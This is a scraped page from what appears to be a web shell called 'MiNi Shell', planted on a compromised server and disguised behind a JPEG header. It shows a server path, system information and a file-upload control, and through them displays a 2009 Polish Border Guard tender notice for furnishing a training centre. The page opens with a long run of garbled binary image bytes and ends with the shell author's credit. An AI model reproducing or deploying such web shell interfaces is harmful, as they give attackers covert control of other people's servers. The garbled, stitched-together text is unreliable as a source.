JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091016/180309-N-2009.html

<p class="kh_header"><b>Kętrzyn: Wyposażenie budynku nr 20 na potrzeby Centrum Szkolenia Straży Granicznej w Kętrzynie</b><br>
<b>Numer ogłoszenia: 180309 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Warmińsko-Mazurski Oddział Straży Granicznej w Kętrzynie , ul. Sikorskiego 78, 11-401 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 750 31 88, faks 089 750 37 54.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warmaz.strazgraniczna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie budynku nr 20 na potrzeby Centrum Szkolenia Straży Granicznej w Kętrzynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa wyposażenia budynku nr 20 na potrzeby Centrum Szkolenia Straży Granicznej w Kętrzynie.
 2.	Opis przedmiotu Zamówienia zawarty jest w załączniku nr 1a, 1b, 1c, 1d do SIWZ.
 3.	Zamawiający przewiduje możliwość składania ofert częściowych na jeden lub więcej zestawów:
3.1. Zestaw nr 1 - Meble (załącznik nr 1a)
3.2. Zestaw nr 2 - Sprzęt gospodarczy  (załącznik nr 1b)
3.3. Zestaw nr 3 - Sprzęt czyszczący (załącznik nr 1c)
3.4. Zestaw nr 4 - Wyposażenie i sprzęt PPOŻ (załącznik nr 1d).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.12.11.00-7, 39.13.00.00-2, 39.12.12.00-8, 39.14.13.00-5, 39.14.31.20-3, 39.13.10.00-9, 39.14.31.22-7, 39.14.10.00-2, 39.11.20.00-0, 39.11.30.00-7, 30.19.21.70-3, 39.53.20.00-0, 31.52.30.00-8, 34.92.84.80-6, 39.83.17.00-3, 39.71.23.00-9, 39.71.34.10-0, 39.71.34.30-6, 35.11.10.00-5, 44.42.34.00-5, 22.47.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22 ust. 1 Ustawy o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
1.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Wykonawcy na potwierdzenie spełniania warunków udziału w Postępowaniu dołączą do oferty oświadczenia i dokumenty wymienione poniżej.
3. Zamawiający dokona oceny spełniania warunków udziału w Postępowaniu zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w przedstawionych w ofercie oświadczeniach i dokumentach, o których mowa niżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 Ustawy oraz nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego, Zamawiający żąda: 
1. Oświadczenia Wykonawcy, że spełnia warunki określone w art. 22 ust.1 Ustawy oraz nie podlega wykluczeniu z Postępowania na podstawie art. 24 ust. 1 i 2 Ustawy zgodnie z załącznikiem nr 3 do SIWZ;
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z wykonawców składających ofertę wspólną.
W przypadku gdy Wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, jest zobowiązany do przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.  
W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Ustawy, Zamawiający żąda:
2. Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 2. składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości.
4. Dokument o którym mowa w punkcie 3. powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
5. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 3. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

UWAGA: Dokumenty, o których mowa powyżej muszą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 24 maja 2006 r. Nr 87 poz. 605 ze zm.). Jeżeli dokument składa się z kilku stron to zaleca się, aby każda z nich była poświadczona za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.warmaz.strazgraniczna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warmińsko-Mazurski Oddział Straży Granicznej, ul. Sikorskiego 78, 11-400 Kętrzyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2009 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego - Kancelaria Jawna - pokój 103 Warmińsko - Mazurskiego Oddziału Straży Granicznej lub przesłać na adres: W-MOSG, ul. Sikorskiego 78, 11-400 Kętrzyn..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MEBLE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw nr 1 - MEBLE
1.	Biurko - 3 szt.                                                                         
2.	Biurko pod komputer - 3 szt.                                                   
3.	Dostawka do biurka - 3 szt.                                                     
4.	Stół kancelaryjny - 3 szt.                                                          
5.	Szafa ubraniowa trzydrzwiowa (komendant) - 3 szt.               
6.	Szafka przyłóżkowa drewniana (komendant) - 3 szt.            
7.	Regał gabinetowy (komendant) - 3 szt.                                   
8.	Półka (komendant) - 3 szt.                                                        
9.	Biurko pod komputer - 22 szt.                                                 
10.	Biurko - 40 szt.                                                                         
11.	Stół kancelaryjny - 5 szt.                                                           
12.	Stolik okolicznościowy - 5 szt.                                                 
13.	Stół konferencyjny - 1 kpl.                                                         
14.	Szafa ubraniowa trzydrzwiowa - 21 szt.                                     
15.	Komoda - 4 szt.                                                                          
16.	Szafka kuchenna pod zlewozmywak - 1 szt.                             
17.	Szafka kuchenna wisząca z suszarką - 1 szt.                              
18.	Szafka przyłóżkowa drewniana - 75 szt.                                   
19.	Regał gabinetowy - 6 szt.                                                      
20.	Półka - 77 szt.                                                                         
21.	Stół kasynowy - 30 szt.                                                           
22.	Krzesło obrotowe - 24 szt.                                                    
23.	Zestaw siedzisk czteroosobowych na belce - 12 szt.               
24.	Tablica informacyjna (korek) - 19 szt.                                    
25.	Tapczan - 71 szt.                                                              
26.	Fotel obrotowy na kółkach - 7 szt.                                    
27.	Regał biblioteczny - 3 szt.                                                  
28.	Krzesło (tapicerowane) - 130 szt.                                      
29.	Wieszak stojący - 10 szt.                                                    
30.	Wieszak ścienny - 30 szt.                                                   
31.	Szafa metalowa ubraniowa BHP - 2 szt.                             
32.	Lampa stojąca - 3 szt.                                                         
33.	Roleta verticale - 52 szt.
34.	Regał magazynowy - 14 szt.
35.	Karnisz - 9 szt.
36. Gablota na klucze - 1 szt.
37. Szafa stalowa na akta certyfikowana kl. A - 4 szt.
38. Przenośna mównica z kolumną - 1 szt.
39. Łóżko sypialniane (apartament) - 3 szt.
40. Materac + ochraniacz na materac (apartament) - 3 kpl.
41. Szafka przyłóżkowa (apartament) - 6 szt.
42. Szafa ubraniowa dwudrzwiowa (apartament) - 3 szt.
43. Zegar ścienny (apartament) - 3 szt.
44. Wieszak stojący (apartament) - 3 szt.
45. Wieszak ścienny na ubrania (apartament) - 3 szt.
46. Szafka na buty (apartament) - 3 szt.
47. Stolik okolicznościowy, szklany (apartament) - 3 szt.
48. Sofa (apartament) - 3 szt.
49. Fotel (apartament) - 3 szt.
50. Komoda (apartament) - 3 szt.
51. Regał z szybą (apartament) - 3 szt.
52. Lustro duże ścienne (apartament) - 3 szt.
53. Stolik pod sprzęt RTV (apartament) - 3 szt.
54. Szafka łazienkowa wisząca z półkami (apartament) - 3 szt.
55. Szafka kuchenna pod zlewozmywak (apartament) - 3 szt.
56. Szafka kuchenna stojąca z półkami (apartament) - 3 szt.
57. Szafka kuchenna stojąca z szufladami (apartament) - 3 szt.
58. Szafka kuchenna z suszarką (apartament) - 3 szt.
59. Szafka kuchenna wisząca z półkami (apartament) - 3 szt.
60. Szafka kuchenna wisząca jednodrzwiowa (apartament) - 3 szt.
61. Lada kuchenna (apartament) - 3 szt.
62. Krzesło barowe - 6 szt.
63. Stojak do rzutnika - 1 szt.
64. Szafka depozytowa - 5 szt. 
65. Tablica magnetyczna - 1 szt.
66. Tablica informacyjna - 4 szt.
67. Tabliczki przydrzwiowe - 50 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.12.11.00-7, 39.13.00.00-2, 39.12.12.00-8, 39.14.13.00-5, 39.14.31.20-3, 39.13.10.00-9, 39.14.31.22-7, 39.14.10.00-2, 39.11.20.00-0, 39.11.30.00-7, 30.19.21.70-3, 39.14.31.10-0, 39.11.31.00-8, 39.13.60.00-4, 39.15.00.00-8, 31.52.12.00-6, 39.51.54.40-1, 39.14.11.00-3, 44.11.58.10-0, 44.42.10.00-7, 37.41.41.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> SPRZĘT GOSPODARCZY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw nr 2 - SPRZĘT GOSPODARCZY
1.	Wycieraczka plastikowa mała - 31 szt.
2.	Wycieraczka plastikowa duża - 2 szt.
3.	Zegar ścienny - 9 szt.
4.	Godło z ramką - 7 szt.
5.	Pojemnik na śmieci, metalowy (chrom) - 50 szt.
6.	Apteczka pierwszej pomocy - 1 szt.
7.	Dozownik do mydła w płynie (chrom) - 36 szt.
8.	Elektryczna suszarka do rąk - 35 szt.
9.	Lustro ścienne - 10 szt.
10.	Lustro duże ścienne - 3 szt.
11.	Lustro ścienne z półką szklaną - 30 szt.
12.	Przedłużacz 5 gniazdkowy z bezpiecznikiem (wyłącznikiem) o długości 3 m - 40 szt.
13.	Lampka biurowa (z żarówką energooszczędną) - 29 szt.
14.	Wieszak na ręcznik - 35 szt.
15.	Wieszak na ręcznik (chrom) - 3 szt.
16.	Uchwyt na papier toaletowy (chrom) - 38 szt.
17.	Szczotka do WC (chrom) - 38 szt.
18.	Wózek roll - mop - 3 szt.
19.	Metalowa szafka na klucze - 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.53.20.00-0, 31.52.30.00-8, 34.92.84.80-6, 39.83.17.00-3, 39.71.23.00-9, 31.22.48.10-3, 31.52.11.00-5, 39.14.40.00-3, 42.96.83.00-2, 39.22.43.10-4, 39.22.43.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> SPRZĘT CZYSZCZĄCY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw nr 3 - SPRZĘT CZYSZCZĄCY
1.	Polerka - 3 szt.
2.	Odkurzacz - 2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.34.10-0, 39.71.34.30-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WYPOSAŻENIE I SPRZĘT PPOŻ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw nr 4 - WYPOSAŻENIE I SPRZĘT PPOŻ
1. Gaśnica proszkowa sześciokilogramowa przeznaczona do gaszenia pożarów grupy A, B i C z wieszakiem GP-6Xabc - 8 szt.
2. Urządzenie gaśnicze UGS-2x z wieszakiem - 1 szt.
3. Znak ewakuacyjny Wyjście ewakuacyjne płyta sztywna świecąca 20x40 cm z przylepcami - 2 szt.
4. Znak ewakuacyjny Kierunek do wyjścia drogi ewakuacyjnej schodami w górę na prawo płyta sztywna świecąca 15x30 cm z przylepcami - 1 szt.
5. Znak ewakuacyjny Kierunek do wyjścia drogi ewakuacyjnej schodami w górę na lewo płyta sztywna świecąca 15x30 cm z przylepcami - 1 szt.
6. Znak ewakuacyjny Kierunek do wyjścia drogi ewakuacyjnej schodami w dół w prawo płyta sztywna świecąca 15x30 cm z przylepcami - 5 szt.
7. Znak ewakuacyjny Kierunek do wyjścia drogi ewakuacyjnej schodami w dół w lewo płyta sztywna świecąca 15x30 cm z przylepcami - 5 szt.
8. Znak ewakuacyjny Kierunek drogi ewakuacyjnej Płyta sztywna świecąca 10x30 cm z przylepcami - 18 szt.
9. Znak ewakuacyjny Drzwi ewakuacyjne - lewe Płyta sztywna świecąca 15x15 cm z przylepcami - 4 szt.
10. Znak ewakuacyjny Drzwi ewakuacyjne -prawe Płyta sztywna świecąca 15x15 cm z przylepcami - 4 szt.
11. Znak ogólny ppoż Gaśnica Płyta sztywna świecąca 15x15 cm z przylepcami - 9 szt.
12. Znak Palenie tytoniu zabronione Płyta sztywna świecąca 20x40 cm z przylepcami - 2 szt.
13. Instrukcja ogólna przeciwpożarowa Płyta sztywna nieświecąca 24,5x35 cm z przylepcami - 5 szt.
14. Instrukcja postępowania na wypadek pożaru Płyta sztywna nieświecąca  24,5x35 cm z przylepcami - 5 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.10.00-5, 44.42.34.00-5, 22.47.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com